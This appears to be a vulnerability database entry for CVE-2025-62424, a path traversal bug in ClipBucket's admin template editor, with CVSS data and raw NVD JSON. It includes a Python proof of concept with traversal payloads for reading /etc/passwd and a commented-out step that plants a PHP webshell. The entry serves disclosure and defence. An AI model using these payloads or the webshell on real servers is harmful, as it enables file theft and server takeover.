Security Vulnerability Report
中文
CVE-2025-62424 CVSS 6.7 MEDIUM

CVE-2025-62424

Published: 2025-10-17 18:15:38
Last Modified: 2025-11-10 19:58:14
Source: [email protected]

Description

ClipBucket is a web-based video-sharing platform. In ClipBucket version 5.5.2 - #146 and earlier, the /admin_area/template_editor.php endpoint is vulnerable to path traversal. The validation of the file-loading path is inadequate, allowing authenticated administrators to read and write arbitrary files outside the intended template directory by inserting path traversal sequences into the folder parameter. An attacker with administrator privileges can exploit this vulnerability to read sensitive files such as /etc/passwd and modify writable files on the system, potentially leading to sensitive information disclosure and compromise of the application or server. This issue is fixed in version 5.5.2 - #147.

CVSS Details

CVSS Score
6.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:oxygenz:clipbucket:*:*:*:*:*:*:*:* - VULNERABLE
ClipBucket <= 5.5.2 - #146

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62424 - ClipBucket Path Traversal PoC # Vulnerability: Path Traversal in /admin_area/template_editor.php via folder parameter # Affected: ClipBucket <= 5.5.2 - #146 # Fixed in: 5.5.2 - #147 # Requires: Authenticated administrator credentials import requests TARGET_URL = "http://target-clipbucket-site.com" ADMIN_USER = "admin" ADMIN_PASS = "password123" # Step 1: Login as administrator session = requests.Session() login_url = f"{TARGET_URL}/admin_area/login.php" login_data = { "username": ADMIN_USER, "password": ADMIN_PASS } session.post(login_url, data=login_data) # Step 2: Exploit path traversal via folder parameter # Read sensitive system file (e.g., /etc/passwd) template_editor_url = f"{TARGET_URL}/admin_area/template_editor.php" # Payload to traverse out of template directory and read /etc/passwd payloads = [ {"folder": "../../../etc/passwd"}, {"folder": "....//....//....//etc/passwd"}, {"folder": "..%2F..%2F..%2Fetc%2Fpasswd"}, {"folder": "..\\..\\..\\etc\\passwd"}, ] for payload in payloads: print(f"\n[*] Trying payload: {payload}") response = session.get(template_editor_url, params=payload) if "root:" in response.text or "nobody:" in response.text: print("[+] Path traversal successful! File contents:") print(response.text[:2000]) break else: print("[-] Payload failed or file not readable.") # Step 3: Write arbitrary file (e.g., plant a webshell) # Example: Write to a writable location write_payload = { "folder": "../../../var/www/html/templates/shell.php", "content": "<?php system($_GET['cmd']); ?>", "action": "save" } # response = session.post(template_editor_url, data=write_payload) # print("[+] Webshell written (if write is permitted)")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62424", "sourceIdentifier": "[email protected]", "published": "2025-10-17T18:15:37.870", "lastModified": "2025-11-10T19:58:14.303", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ClipBucket is a web-based video-sharing platform. In ClipBucket version 5.5.2 - #146 and earlier, the /admin_area/template_editor.php endpoint is vulnerable to path traversal. The validation of the file-loading path is inadequate, allowing authenticated administrators to read and write arbitrary files outside the intended template directory by inserting path traversal sequences into the folder parameter. An attacker with administrator privileges can exploit this vulnerability to read sensitive files such as /etc/passwd and modify writable files on the system, potentially leading to sensitive information disclosure and compromise of the application or server. This issue is fixed in version 5.5.2 - #147."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 5.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oxygenz:clipbucket:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.3", "versionEndExcluding": "5.5.2-147", "matchCriteriaId": "31214EBB-325C-478D-9E78-FACDB17B17D2"}]}]}], "references": [{"url": "https://github.com/MacWarrior/clipbucket-v5/commit/c06d0f2e69c9acb008cebbd34fd5f29da3191a28", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/MacWarrior/clipbucket-v5/security/advisories/GHSA-3v2p-rfwx-52qj", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.